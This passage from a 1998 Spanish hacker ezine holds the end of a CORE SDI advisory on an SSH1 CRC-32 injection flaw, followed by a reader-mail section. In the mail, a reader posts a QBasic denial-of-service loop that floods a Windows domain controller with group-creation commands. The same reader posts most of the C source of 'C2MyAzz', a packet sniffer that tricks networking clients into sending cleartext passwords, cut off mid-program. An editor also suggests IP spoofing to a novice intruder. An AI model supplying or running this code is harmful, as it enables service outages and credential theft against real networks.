paquete es un inteto por hacer mas dificiles
ataques de texto en claro conocido
(known plaintext attacks)
Packet type: Un byte sin signo de 8 bits
Data : length - 5 bytes de datos
CRC-32 : 4 bytes para el chequeo de integridad.
El CRC se calcula antes de realizar
la encripcion.
La encripcion se realiza sobre los campos 'padding', 'type',
'data' y 'CRC', el campo 'length' nunca se encripta. La parte
encriptada del paquete tiene un tamanio que es siempre multiplo
de 8 bytes.
Conociendo ciertas caracteristicas de los modos de encripcion
utilizados (CBC por ejemplo), con un texto en claaro conocido, un
atacante puede construir un paquete SSH propio ( del tipo
SSH_CMSG_STDIN_DATA) con los bytes de relleno calculados
de tal manera que los siguientes 8 bytes del paquete se
desencriptaran a un texto en claro a eleccion del atacante.
En este caso en particular, los bytes desencriptados corresponderan
al campo 'type' y 7 bytes de datos.
Despues de esto 16 bytes (relleno+tipo+7 bytes de datos) el
atacante debe incluir una cantidad variable de bytes calculados
con el proposito especifico de producir un CRC-32 valido para todo
el paquete una ves que el mismo es desencriptado.
Este ataque y variaciones utilizando la misma tecnica puede realizarse
debido al uso de un esquema de verificacion de integridad que
es inherentemente debil. En particular CRC-32 posse ciertas
propiedades que permiten al atacante generar un paquete con
datos arbitrario y aun asi obtener un valor de CRC que es valido.
Por supuesto que para que este ataque sea exitoso el atacante
debe tener acceso al canal encriptado entre cliente y servidor,
ya sea realizando un ataque activo de red, interponiendose
entre cliente y servidor a nivel de aplicacion SSH o realizando
un ataque de toma de sesion TCP.
Un ataque de este ultimo tipo se describe en [6] y para
el caso de SSH los dos metodos de de-sincronizacion de
TCP mencionados pueden ser utilizados.
Especificamente, el metodo descripto como "Null data
desynchronization" puede realizarse utilizando paquetes
SSH de tipo SSH_CMSG_IGNORE.
Es importante senalar que la nueva revision del protocolo
SSH, propuesta y publicada como Internet Drafts [2], [3], [4]
y [5] hace uso de codigos de autenticacion de mensajes (MACs)
criptograficamente fuerte y no suceptibles a este ataque.
Aun cuando se hallan encontrado problemas en el protocolo
SSH, es todavia una alternativa mucho mas segura que el uso de
las aplicaciones telnet, rsh y rlogin.
[1] "The SSH (Secure Shell) Remote Login Protocol", T. Ylonen
Helsinki University of Technology. November 15th 1995
(draft expired on May 15th, 1996)
Included as the file ./RFC in the ssh distribution
<http://www.cs.hut.fi/ssh>
[2] "SSH Protocol Architecture", draft-ietf-secsh-architecture-01.txt.gz
T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997
[3] "SSH Connection Protocol", draft-ietf-secsh-connect-03.txt.gz
T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997
[4] "SSH Authentication Protocol", draft-ietf-secsh-userauth-03.txt.gz
T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997
[5] "SSH Transport Layer Protocol",draft-ietf-secsh-transport-03.txt.gz
T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997
(drafts expired on May 7th, 1998)
Todos los Internet Drafts estan disponibles en:
<ftp://ftp.isi.edu/internet-drafts/>
[6] "Simple Active Attack Against TCP", Laurent Joncheray,
Merit Networks Inc., 5th USENIX Security Simposium. 1995.
Impacto:
~~~~~~~~
Un atacante con acceso al canal SSH encriptado puede
insertar bloque en el canal que se desencriptaran
a text en claro de su eleccion pusibilitando la ejecucion
de cualquier comando en el servidor SSH.
Informacion para solucionar el problema
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Haga un upgrade a la version 2 del protocolo SSH,
disponible al publico en los proximos dias.
Usuarios de la version comercial F-Secure SSH deben
contactar a Data Fellows Inc. para informacion
sobre como realizar el upgrade a F-Secure SSH 2.0
Note que la version 2 del protocolo NO es compatible
con las versiones anteriors y por lo tanto tambien
necesitara hacer un upgrade de los clientes SSH.
Mientras tanto puede realizar un upgrade a la version
1.2.25 de SSH, que soluciona el problema.
La distribucion 1.2.25 puede obtenerse de:
<ftp://ftp.cs.hut.fi/pub/ssh/ssh-1.2.25.tar.gz>
La version 1.3.5 de F-Secure SSH soluciona este problema.
Si Ud. usa el paquete comercial Data Fellows SSH y tiene un
contrato de soporte puede obtener F-Secure SSH de su
distribuidor local.
Usuarios sin contrato de soporte pueden obterner un patch
que soluciona el problema de:
<http://www.DataFellows.com/f-secure/support/ssh/bug/su134patch.html>
Adicionalmente, puede obtener un patch para la distribucion
libre SSH 1.2.23 y el paquete complete con el patch instalado
de:
<http://www.core-sdi.com/ssh>
A continuacion se incluyen los hashes MD5 de los archivos
correspondientes
MD5 (ssh-1.2.23-core.tar.Z) = fffb52122aae26c1f212c051a305a310
MD5 (ssh-1.2.23-core.tar.gz) = f9509ba0f0715637805c6b116adc0869
MD5 (ssh-1.2.23.patch) = 6bdb63d57f893907191986c5ced557ab
Sistemas vulnerables:
~~~~~~~~~~~~~~~~~~~~
Todos los sistemas utilizando implementacions de la version 1.x
de SSH son vulnerables. Esto incluye versiones de software hasta
la 1.2.23 y F-Secure SSH 1.3.4
Para determinar que version de SSH esta corriendo su servidor
utilice los siguientes comandos:
$ telnet <direccion IP del servidor> 22
Trying <direccion IP del servidor>...
Connected to <direccion IP del servidor>.
Escape character is '^]'.
SSH-1.5-1.2.23
\ / \--------- version de software
|------------ version del protocolo
^]
telnet> close
Connection closed.
$ exit
Informacion adicional
~~~~~~~~~~~~~~~~~~~~~
Este problema fue descubierto por Ariel Futoransky
<futo@core-sdi.com> y Emiliano Kargieman <ek@core-sdi.com>
CORE SDI agradece a Tatu Ylonen <ylo@ssh.fi> y Tero Kivinen
<kivinen@ssh.fi>, quienes realizan el mantenimiento de SSH, por
su pronta respuesta a los problemas descriptos en esta
advertencia de seguridad.
La informacion para la solucion del problema en los
productos F-Secure de Data Fellows Inc. fue proporcionada
por Olli Voima <olli.voima@DataFellows.com>
Preguntas y comentarios con respecto a esta advertencia
de seguridad pueden ser enviados a:
Ariel Futoransky <futo@core-sdi.com>
Emiliano Kargieman <ek@core-sdi.com>
Para mayor informacion sobre CORE SDI S.A. puede contactar a
<core@core-sdi.com> o visitar <http://www.core-sdi.com>
Si desea contactar a CORE puede utilizar la siguiente clave
publica de PGP:
Type Bits/KeyID Date User ID
pub 1024/CF4E0CF5 1998/05/18 CORELABS <corelabs@core-sdi.com>
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia
Comment: Requires PGP version 2.6 or later.
mQCNAzVgfMgAAAEEAJSfJNdvCwIAc4AK0ckeimubLIwzsRVDRhjPQIOYt/7kxxio
DZybr53fwMEjyT8cHXRL08i0R9rcuFeCNAez6XcalbhqUKXDcLL/cZK80CCDSCs5
tRCZGGOEBnXQIoyvbvi4gNYhBS5wUvmh3b/mvRFTvhmRrUy9m/nO/LnPTgz1AAUR
tCBDT1JFTEFCUyA8Y29yZWxhYnNAY29yZS1zZGkuY29tPokAlQMFEDVgfMn5zvy5
z04M9QEBC6ED/0Szt3f54JTvkZG3ezQ8G60HvAw4/A5Ti6i3oze6jsXxzGp6pA1x
i0jaZpKaUSpo0MLc7BcijMKneuUHnN3XtN5YxtFt0aEoot1MIvv4BsdeUb3x257G
3+vr8SxGk44Vm4tfuN8F/2dNo/00yYP9rd3zQ8Tl+gmr5VxnLViZIDuh
=ulRg
-----END PGP PUBLIC KEY BLOCK-----
Copyright Notice:
~~~~~~~~~~~~~~~~~
El contenido de esta advertencia de seguridad es Copyright (C)
1998 de CORE SDI S.A. y puede ser distribuido libremente
siempre y cuando se haga en forma gratuita y se otorgue el
credito apropiado a los autores originales.
$Id: ssh-advisory.txt.esp,v 1.7 1998/06/11 22:05:03 iarce Exp $
<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->
⁄-----------------ø
< EL LECTOR OPINA >
¿-----------------Ÿ
Esta seccion esta funcionando muy bien por lo visto, pero parece
mentira que incluso en el 6 numero, haya lectores que nos escriban al
buzon de Hotmail (el cual ya NO es valido) y por otro lado que algunos
nos envieis mail's preguntado sobre clases o incluso cosas mucho mas
tontas. Lo recomendable es que penseis antes de enviarnos un mail.
Es una lastima que todavia esta seccion no haya alcanzado el
dinamismo que nosotros pretendiamos, pero seguiremos en nuestra cruzada de
intentarlo, algun lector si que se esfuerza en ayudar como podreis
comprobar mas abajo, por eso a todos esos muchas gracias. Y ahora a
divertirse :)
<---------------------------------------------------------------------------->
Date: Sat, 25 Jul 1998 07:37:13 GMT
From: Manuel-el oso <sambam@xxxxxxxxxxxxxx>
To: conde_vampiro@usa.net
Subject: guia irc
hola conde,
que tal?
acabo de leer tu guhirc.....
esta genial. Enhorabuena!
Si puedes me gustaria que me contestaras
a algunas preguntitas:
Que herramienta hay para "dormir
mi PC portatil" y que al despertar
este justo en el mismo punto
donde lo deje?
Como puedo desensamblar un
binario ejecutable para linux?
existe winzip (o similar)
para linux?
que newsreader utilizas?
que newsgroups frecuentas?
muchas gracias
Manu
PD: aupa JJF!
,-. __ .-,
--;`. ' `.' "Guantanamera....Guajira guantanamera..."
/ ( ^__^ ) Zzzzz!! ftp.giga.or.at/pub/hacker/Incoming/spv001.zip
; `(_`'_)' \ Skate or die! - Madrid 107.4 FM
' ` .`--'_, ;
~~`-..._)))(((.' sambam@xxxxxxxxxxxxxx
<------>
[ Pues thx por los cumplidos :) Sobre los portatiles, es que eso ya lo
hacen, mira la caracteristicas del tuyo. Sobre Linux mira el cursillo que
encontraras en este numero y sobre winzip para Linux, yo no conozco.
Nunca suelo pasar por las news. ]
<---------------------------------------------------------------------------->
Date: Tue, 14 Jul 1998 09:23:23 GMT
From: jaina7@xxxxxxxxxxxxxx (grieko)
To: conde_vampiro@usa.net
conde estas ahi?
que paso bueno te escribo pues para tener a alguien que oriente en mis
dudas espero respuesta ok sabes algo de novell?
ok
<------>
[ Como ya hemos dicho muchas veces no damos clases privadas, nuestro consejo
es que leas este ezine. Sobre novell pillate el FAQ DE NOVELL.
http://www2.s-gimb.lj.edus.si/natan/stuff2.html
http://www.nmrc.org ]
<---------------------------------------------------------------------------->
Date: Tue, 07 Jul 1998 13:51:20 GMT
From: "Miguel Soto" <msoto@xxxxxxxxxxxxxx>
Acabo de conocer vuestra pagina a traves de la revista Jump y creo que
aparte de un buen diseño tiene mucho contenido que leere poco a poco.
Espero que no desaparezca vuestra direccion, como otras de vuestro style,
si esto ocurriese o para cualquier otra cuestion mi e-mail es
rbellamy@xxxxxxxxxxxxxx , soy cuasiinformatico de carrera osease como aquel
que tiene un primo en Alcala que ni es primo ni es na.
Estoy en el ordenador de un amigo asi que espero que no le echeis mucha
cuenta al remitente.
Saludos de un Sevillano fan de la informatica y de comun acuerdo con
vuestra filosofia. Roberto.
<------>
[ ® En la revista Jump ?, es la primera noticia que tengo que salimos alli,
espero que hayan sido buenas criticas :) Nosotros no pensamos desaparecer
si no todo lo contrario nos expandimos, o sea que no te preocupes y
siempre estaremos por Inet. ]
<---------------------------------------------------------------------------->
From: Split <split@xxxxxxxxxxxxxx>
To: conde_vampiro@usa.net
Subject: Peticion de un documento txt
Holas, vuelvo a escribiros ya que no he recibido respuesta.
Os pedia un documento titulado "La Superguia del Hacker" por Nobody
(hackear desde win95).
Ya que he estado buscando este doc pero no he podido encontrarlo, puesto
que hablaron de el en el n 4 de su ezine, en concreto referente a un
mail :)))
Sin mas y dandote las gracias
Split
<------>
[ Garantizado para el n°7 y encima la Version Deluxe :) ]
<---------------------------------------------------------------------------->
Date: Wed, 10 Jun 1998 02:16:55 GMT
From: "Angel torrez" <mosqueteros_69@xxxxxxxxxxxxxx>
To: conde_vampiro@usa.net
Subject: Ayuda Urgente
Estimado conde Vampiro permitame saludarle y desearle una feliz noche
(por que me imagino como es usted vampiro solo saldra por las noches)
bueno como introduccion quiero decirle muchas gracias por todos sus
escritos nos han servido de mucho, tambien ese texto de hack de una Web
estaba muy bien, pero nosotros somos un grupo de personas de Nicaragua
que estamos iniciando en este maravilloso mundo del hackers, por lo cual
nosotros pedimos su ayuda para que nos guie en esta dificil tarea,
seremos sus aprendices, es cierto que una de las reglas es no preguntar
por que supuestamente lo sabemos todo, pero hemos roto esa regla para
abocarnos a usted conde para que nos enseñe a dar unas que otras
mordidas en la net, para iniciar tenemos una pequeña duda, cuando
nosotros nos conectamos por telnet al servidor xxxxx este servidor no
capta nuestro numero de IP, por lo cual ya nos pueden agarrar, esa es
nuestra primera pregunta.
Espero que no la mires tan TONTA.
<------>
[ Pues como siempre decimos lee nuestros ezines y documentos :) No entiendo
bien tu pregunta, supongo que te refieres a que el server pilla tu IP
y quieres saber como evitar eso, pues tienes muchas maneras, IP-SPOOFING
es una de ellas y ahora piensa un poco tu :)
No existen las preguntas tontas si no preguntas mal formuladas en todo
caso ;-) ]
<---------------------------------------------------------------------------->
Date: Fri, 31 Jul 1998 16:00:33 GMT
From: <Akira2o0o@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: ............
.............ninguno de tus links de phreak sirven pues e querido bajar
algunos programas y me sale con que no lo encuentra......que paso pues....
hay mandame un E-mail cuando las pongan a funcionar...K.....
<------>
[ Ya decimos que actualizamos los link's lo mas rapido posible pero el
web es muy dinamico, por tanto complicado estar a la ultima. ]
<---------------------------------------------------------------------------->
From: "Miguel Celis" <fliacelis@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: saludos desde colombia
mis felicitaciones por esa excelente y enviciante pagina.
quisiera comunicarte una inquietud que tengo; fijate como solo estoy
incursionando al tema de los phreaker y como tengo ese interes tan
imenso por conocer lo que esconde en sus entrañas este nuevo (para mi
por lo menos) mundo quisiera que pusieras mas archivos de textos
refiriendose a este tema ya sea informacion general o especifica.
Si haces caso a mi peticion, eres tu muy amable.
saludos a tus compañeros hackers, crackers, phreakers y todo lo que se
invenmten nuevo que termine en "kers".
se despide !el 11!
<------>
[ Pues thx, ya hemos publicado algo de phreak y tienes muchas cosas en
nuestro web, por lo que recomiendo que te pases por la seccion PHREAK. ]
<---------------------------------------------------------------------------->
From: Nain <nii97068@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: pregunta
hola,
acabo de descubrir vuestra revista y me la quiero bajar... todos los n°
para leerla tranquilamente, sin embargo tengo un problema, siempre que
intento bajarmela, nunca esta completa... siempre las frases estan cortadas
por la mitad. que puedo hacer para solucionar esto?
Os ruego me respondais rapidamente porque tengo muchas ganas de terminar de
leerla.
Un saludo.udo.
<------>
[ Pues ya hemos puesto un zip con el primer volumen entero y no pinches
encima del ezine si no que clickea con el mouse y dale al boton derecho
para salvar el fichero :) ]
<---------------------------------------------------------------------------->
From: "A.A.A" <claw@xxxxxxxxxxxxxx>
Subject: intereses
Quisiera saber porque mas de la mitad de lugares que poneis en vuestras
listas no estan disponibles. Os los han cerrado o censurado o simplemente
no teneis esa informacion.
Vais a seguir publicando mas i-zine en vuestra web?
Podrias mandarme direcciones de paginas web para principiantes al hacking,
phreaking, y virus ya me cuesta encontrar paginas completas da igual que
esten en ingles.
<------>
[ Ya hemos dicho que es dificil el asunto de los linkÔs. ®® Quien dice que
no vamos a publicar mas ?? Y mas cosas que estamos haciendo ;-)
Para ver webÔs pasate por la seccion LINKS ]
<---------------------------------------------------------------------------->
From: Daniel R. <zago@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: Pregunta
Hola acabo de visitar su pagina y me parecio que es una de las mejores que
he visto pero tengo una pregunta que hacerles:
Quisiera poder conseguir el username y el pasword de una pagina
(www.anacam.com). Pude bajar "john the ripper vl.4" desde su pagina pero no
puedo instalarlo, hay un archivo de nombre "install" pero no le entiendo
como puedo hacerle para poder arrancar el programa. Me podrian ayudar a
instalar este programa ho recomendarme uno mas facil de usar.
DE antemano Muchas Gracias
ATTE.
Daniel R.
<------>
[ Thx pero NO nos dedicamos a hackear webÔs a peticion de los lectores.
Pasate por nuestra seccion CRACK y pillate el John, pues es raro porque
se instala bien, vuelve a probar y leete la ayuda :) ]
<---------------------------------------------------------------------------->
From: Nombre y apellidos <xxxxxxxx@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: subscribe
He intentado bajarme los Zines pero se corta a medio, podeis
comprimirlos todos en un zip y enviarmelos a jmt1@xxxxxxxxxxxxxx
Gracias.
<------>
[ No podemos enviarlos a todos los lectores, ya hemos puesto el primer
volumen en zip y unos cuantos mailÔs arriba explicamos como lo tienes
que poder bajar correctamente. ]
<---------------------------------------------------------------------------->
From: Elena <prophet@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: {CyBoRg} Continuacion respuesta
Bueno sigo con la respuesta a DANY, por aki tengo un programilla
en qbasic que es un DoS, te lo pongo para que veas, este DoS lo
que hace es que empieza a crear grupos locales en un PDC. Asi
que en un rato de na el PDC esta saturado de grupos y se llena
el HD y se queda colgao, (me he pasao explicando lo que hace)
------------ Codigo Fuente ---------------------------------------------------
DIM var AS INTEGER
DIM hack1 AS STRING
DIM hack2 AS STRING
DO WHILE var < 10000000
var = var + 1
hack1 = "hack" + LTRIM$(STR$ (var))
hack2 = "net localgroup " + hack1 + " /add /domain"
SHELL hack2
LOOP
------------ FIN -------------------------------------------------------------
Bueno, ya si que os dejo de una vez, joder que calor...........
{CyBoRg}
SHG Security Group
<------>
[ Pues muchas gracias por ayudar con esta seccion :) ]
<---------------------------------------------------------------------------->
From: Elena <prophet@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: {CyBoRg} - SHG Security -
Hi, de nuevo, os envio este mensaje para responder a "DANY" que
preguntaba sobre troyanos para NT en visual basic o pascal, le
digo que es muy dificil encontrar algo en estos lenguajes, a no
ser que lo hagas tu. Nosotros hemos llegado a hacer un
programilla de seguridad para NT en visual para chapar cosas del
registro, aunque lo del regedit es un coñazo y mas si se lo
haces a alguien remotamente :))).
Bueno aqui te pongo el fuente de un programa para capturar pass
en texto plano es en C, pero bueno, haber si encuentro otro
troyano que tenia, lo he perdido entre todas las cosas que tengo
y si lo encuentro lo envio luego.
------------ Codigo Fuente ---------------------------------------------------
/*
C2MyAzz - Sirve para capturar login y pass en texto plano
*/
#include <dos.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma pack(1)
#include "c2myazz.h"
#define MAXENTRIES 20
// Function prototypes
void _loadds _far CntrlEntryPt ();
void _loadds _far RxISR ();
u8 stuffit(IPpac _far *, PID _far *, u8 _far *);
void _loadds _far TXCompleteESR();
void init();
void _loadds _far grabit();
// Global data
void (_far * LSLInitEntryPt)(); //ptr to func that returns a ptr
InfoBlock LSLInfoBlock; // LSL Info block - 2 ptrs
RxNode Rnode;
u16 BoardNum;
ODIStat Rtn;
void (_far * LSLProtocolSupportEntryPt)(); // ptr LSL funct
void (_far * LSLGenServicesEntryPt )();
void (_far * MLIDSupportEntryPt)();
void (_far * MLIDControlEntryPt)();
u8 _far * signature;
union REGS regsin;
union REGS regsout;
struct SREGS segs;
configtbl cfgtab;
stattbl stattab;
EventCB XmitECB=3d{0};
u8 immAddr[6];
EventCB _far * ECB;
LookAhead _far * LkAhead;
IPpac _far * pacptr;
u16 CurEntry =3d 0; // index for big buffer
IPInfo Data [MAXENTRIES]; // big buffer for captured data
u16 DataEnd;
u8 sendOK;
u8 getpkt;
EventCB _far * RcvECB;
//*************************************************************************
//
// Build CntrlEntryPt as required by LSL.
// upon entry:
// bx =3d function number (0-8)
// cx =3d parameter as required by bx
// es:si =3d ptr as required by bx
// upon exit:
// ax =3d completion code ( 0 =3d successful)
// es:si =3d as required by bx
// registers DS BP ES SI SS SP preserved
//
//*******************************************************************
void _loadds _far CntrlEntryPt ()
{
_asm
{
mov ax, 0 ; preset AX to success
test bx, 0
je getcfg
test bx, 1
je getstat
test bx, 2
je LSLbind
test bx, 3
je unbind
test bx, 4
je dereg
test bx, 5
je promis
test bx, 6
je reserve
test bx, 7
je reserve
test bx, 8
je manage
jmp error
getcfg:
mov ax, SEG cfgtab
mov es,ax
mov ax,0
mov si, OFFSET cfgtab
jmp goback
getstat:
mov ax,SEG stattab
mov es,ax
mov ax,0
mov si, OFFSET stattab
jmp goback
LSLbind:
mov ax, 08009h
jmp goback
unbind:
jmp goback
dereg:
jmp goback
promis:
jmp goback
reserve:
jmp error
manage:
jmp goback
error:
mov ax, 08008h ; bad command
jmp goback
goback:
}
}
//*****************************************************************
//
// Rx ISR - called by LSL
//
// Grabs the lookahead buffer from LSL and passes it to Stuffit
// If the packet is of intereset, call LSL and get an ECB from
// LSL's pool, sends to grabit
//
//
//******************************************************************
#pragma check_stack(off)
void _loadds _far RxISR ()
{
_asm
{
mov word ptr LkAhead, di
pop ax ; get callers ds into ax
push ax
mov word ptr LkAhead+2, ax
push di
push si
push es
}
// Check to see if we want this packet
getpkt=3d(stuffit ((IPpac _far *)LkAhead->DataPtr, &LkAhead->ProtocolID,
&(LkAhead->MediaHdr[6])));
if(getpkt =3d=3d 0)
_asm
{
pop es
pop si
pop di
mov ax, 8001h ; pass to next scanner
or ax, ax ; set ZF based on value of AX
}
else
{
_asm
{
mov bx,0 ;Get an ECB from LSL's pool
call far ptr LSLProtocolSupportEntryPt
mov word ptr[RcvECB],si
mov word ptr[RcvECB+2],es
}
// Fill out the necessary fields in the ECB
RcvECB->BoardNum=3d0;
RcvECB->ProtocolID[0]=3d0;
RcvECB->ProtocolID[1]=3d0;
RcvECB->ProtocolID[2]=3d0;
RcvECB->ProtocolID[3]=3d0;
RcvECB->ProtocolID[4]=3d8;
RcvECB->ProtocolID[5]=3d0;
RcvECB->ProtocolNum=3d0xABCD;
RcvECB->DataLen=3d1480;
RcvECB->Frag1Len=3d1480;
RcvECB->FragCnt=3d1;
RcvECB->ECBISR=3dgrabit;
RcvECB->Frag1Addr=3d((u8 far *)((void far
*)RcvECB)+(((sizeof(EventCB)+3)>> 2) << 2));
_asm
{
add sp,4
mov word ptr ss:[bp-4],si
xor ax, ax ;clear AX and reset ZF
pop di
}
}
}
//*************************************************************
// Init - checks for supporting software and hardware
//
//*************************************************************
void init()
{
u16 i;
u16 ComCode;
//*****************************************************************
// Initialization routines
// Check to see if LSL is loaded (int vector 2F is viable)
regsin.x.ax =3d 0x352f;
intdosx ( Æsin, Æsout, &segs);
if (((regsout.x.bx | segs.es ) =3d=3d 0) || ((regsout.x.bx & segs.es )
=3d=3d -1))
{
printf ("C2MyAzz: LSL not loaded. Exiting.\n ");
exit;
}
// Locate the LSL intial entry pt. Note that we're scanning
// for TSRs, starting at C0 to FF.
for ( i =3d 0xC0; i < 0xFF; i ++)
{
regsin.h.ah =3d i;
regsin.h.al =3d 0;
int86x (0x2F, Æsin, Æsout, &segs);
if ( regsout.h.al =3d=3d 0xFF) // something is installed, check it
{
(long)signature =3d (long)regsout.x.si ; // ptr to LSL id
(long)signature =3d ((long)segs.es << 16) | (long)signature;
if (_fstrncmp ((u8 _far *)signature, (u8 _far *)"LINKSUP$", 8)) //
check for LSL id
continue; // not LSL, continue
else
{
(long)LSLInitEntryPt =3d (long)regsout.x.bx ;
(long)LSLInitEntryPt =3d (long)LSLInitEntryPt |
((long)regsout.x.dx << 16);
break; // got LSL exit loop
}
}
}
if (!LSLInitEntryPt)
{
printf ("C2MyAzz: LSL is not loaded \n ");
exit;
}
LSLInfoBlock.LSLAPI =3d 0;
// call the LSL initial entry pt to fill in the LSL info block
_asm
{
push es
push ds
mov ax, SEG LSLInfoBlock
mov es, ax
mov si, OFFSET LSLInfoBlock ; ES:SI =3d ptr to info block
mov bx, 4 ; bx =3d req code 4
call far ptr LSLInitEntryPt ; get LSL info block
pop ds
pop es
}
// move function ptrs from info block (optional)
LSLProtocolSupportEntryPt =3d (void (_far *)())LSLInfoBlock.LSLAPI;
LSLGenServicesEntryPt =3d (void (_far *)())LSLInfoBlock.GSAPI;
MLIDSupportEntryPt =3d (void (_far *)())LSLInfoBlock.MLIDAPI;
// Assume that we're only dealing with one board
BoardNum =3d 0;
// Get MLID Control Entry point for later use
_asm
{
push es
push ds
mov ax, BoardNum
mov bx, 012h ; Get MLID Control Entry Pt
call far ptr LSLProtocolSupportEntryPt
mov word ptr [MLIDControlEntryPt], si
mov word ptr [MLIDControlEntryPt +2], es
pop ds
pop es
mov ComCode, ax
}
if (ComCode !=3d 0)
{
printf ("C2MyAzz: cannot get MLID control entry pt rtn =3d %x. Is your
MLID loaded? \n", ComCode);
exit;
}
// Set the look ahead size of MLID to 128 bytes
_asm
{
push es
push ds
mov ax, BoardNum
mov bx, 9 ;set look ahead size
mov cx, 80h
call far ptr MLIDControlEntryPt
pop ds
pop es
mov ComCode, ax
}
if (ComCode !=3d 0)
{
printf ("C2MyAzz: cannot set look ahead size to 128 rtn =3d %x \n",
ComCode);
exit;
}
printf ("C2MyAzz: Lookahead set to 128 bytes \n");
// Register the RX prescanner stack with LSL
// init RX Node CB
Rnode.boardnum =3d BoardNum;
Rnode.position =3d LAST_MUST;
Rnode.ISR =3d &RxISR;
Rnode.StackID =3d 0xABCD;
Rnode.ControlEntryPt =3d &CntrlEntryPt;
Rnode.PacFilterMsk =3d 0xFFFF;
_asm
{
push es
push ds
mov ax,ds
mov es,ax
mov si, OFFSET Rnode
mov bx, 01Ch ;register the RX prescanner
call far ptr LSLProtocolSupportEntryPt
pop ds
pop es
mov ComCode, ax
}
if (ComCode !=3d 0)
{
printf("C2MyAzz: cannot register RX prescanner rtn =3d %x \n", ComCode);
exit;
}
printf("C2MyAzz: Receive prescanner now registered \n");
// Enable promiscuous mode on the adapter so the we will receive all packets
_asm
{
push es
push ds
mov ax, BoardNum
mov bx, 0ah ;set promiscuous mode
mov cx, 1 ;all frames
call far ptr MLIDControlEntryPt
pop ds
pop es
mov ComCode, ax
}
if (ComCode !=3d 0)
{
printf("C2MyAzz: cannot set board in promiscuous mode rtn =3d %x \n",
ComCode);
printf(" Does your board support promiscuous mode? \n");
exit;
}
printf ("C2MyAzz: Board now in promiscuous mode \n");
// Reset prescan stack to accept all frames
i=3dRnode.StackID; // Cheat the assembler
_asm
{
push es
push ds
mov ax, BoardNum
mov bx, 02bh ;modify stack filter
mov cx, i
mov dx, 0ffffh ;take everything
call far ptr LSLProtocolSupportEntryPt
pop ds
pop es
mov ComCode, ax
}
if (ComCode !=3d 0)
{
printf("C2MyAzz: cannot set stack filter rtn =3d %x \n", ComCode);
exit;
}
}
//*****************************************************************************
// Uninit - deregisters the prescan stack
//*****************************************************************************
void uninit(void)
{
u16 ComCode;
_asm
{
push es
push ds
mov ax,ds
mov es,ax
mov si, OFFSET Rnode
mov bx, 01Fh ;Deregister the RX prescanner
call far ptr LSLProtocolSupportEntryPt
pop ds
pop es
mov ComCode, ax
}
if (ComCode !=3d 0)
{
printf("C2MyAzz: cannot deregister RX prescanner rtn =3d %x \n",
ComCode);
return;
}
}
u8 stuffit(IPpac _far *pacptr, PID _far *pid, u8 _far *immAddr)
{
//Check to see if this is an SMB within IP
if (_fstrncmp((void far *)pacptr->x.SMB.IDString, (void far *) "SMB", 3)
!=3d 0)
return(0);
//Is this packet a SMB Neg Request?
if(pacptr->x.SMB.FunctionCode < 0x72)
return(0);
//Is this packet creating a server connection?
if(pacptr->x.SMB.FunctionCode > 0x73)
return(0);
//Must be a packet of interest.
return(1);
}
void _loadds _far grabit(void)
{
//Grab what we need from the packet
if (CurEntry < MAXENTRIES) // test for overflow
{
pacptr=3d(IPpac _far *)RcvECB->Frag1Addr;
Data[CurEntry].size=3d((pacptr->length >> 8) & 0x00FF) |
((pacptr->length << 8)& 0xFF00);
_fmemmove((void far *) Data[CurEntry].data, (void far *) pacptr,
Data[CurEntry].size);
_fmemmove((void far *) &Data[CurEntry].pid, (void far *)
RcvECB->ProtocolID, sizeof(PID));
_fmemmove((void far *) Data[CurEntry].immAddr, (void far *)
RcvECB->ImmAddr, 6);
_fmemmove((void far *) &Data[CurEntry].type, (void far
*)pacptr->x.SMB.FunctionCode, 2);
_asm
{
mov bx,1 ;Return ECB to LSL pool
mov si, word ptr[RcvECB]
mov es, word ptr[RcvECB+2]
call far ptr LSLProtocolSupportEntryPt
xor ax, ax ;clear AX and reset ZF
}
CurEntry++; // bump counter for next packet
}
}
#pragma check_stack(on)
//*************************************************************
// Empty transmit complete ESR for LSL
//
//*************************************************************
void _loadds _far TXCompleteESR()
{
// Stack is ready for the next packet
sendOK=3d0;
}
//*************************************************************
//
// Main processing of the packet occurs here.
// Setup the forged ECB, then loop until a packet comes in
//
//*************************************************************
main ()
{
IPpac *ECBData;
u8 buffer[256];
ODIStat Rtn;
u16 i;
u16 ComCode;
u16 j;
ODIStat Stat;
int ch;
u32 SourceAddress;
u32 DestAddress;
u16 sourcePort;
u16 destPort;
u32 seqNum;
u32 ackNum;
u32 nextseqNum;
u16 MuxID;
u16 TreeID;
u16 ProcID;
u8 type;
PID pid;
char password[24];
char username[16];
u8 commandresp;
u32 sum;
u16 *ptr;
u16 pktlen;
u8 foundpw;
u8 pwlen;
u8 wstype; // 0 if 95, 1 if NT
printf("C2MyAzz - Tricks Microsoft Networking clients to send their password
as\n");
printf(" clear text. Displays a username/password combination.
\n");
printf(" C2MyAzz requires LSL and a promiscuous mode LAN
driver.\n\n");
printf(" Use at your own risk. Read Microsoft's CIFS
documentation\n");
printf(" for more NT security holes. Copyright(c) 1997 \n\n\n");
// Setup for prescan
init();
printf("C2MyAzz: All packets will now be received\n");
printf("C2MyAzz: Ready to scan for passwords\n");
printf("C2MyAzz: (press any key to exit)\n\n\n");
// Setup some of the static ECB information so that we don't waste cycles
// when processing the packets
XmitECB.Frag1Addr =3d buffer;
ECBData =3d (IPpac *)buffer;
XmitECB.DataLen =3d 105;
XmitECB.ECBISR =3d TXCompleteESR;
XmitECB.Frag1Len =3d 105;
XmitECB.BoardNum =3d BoardNum;
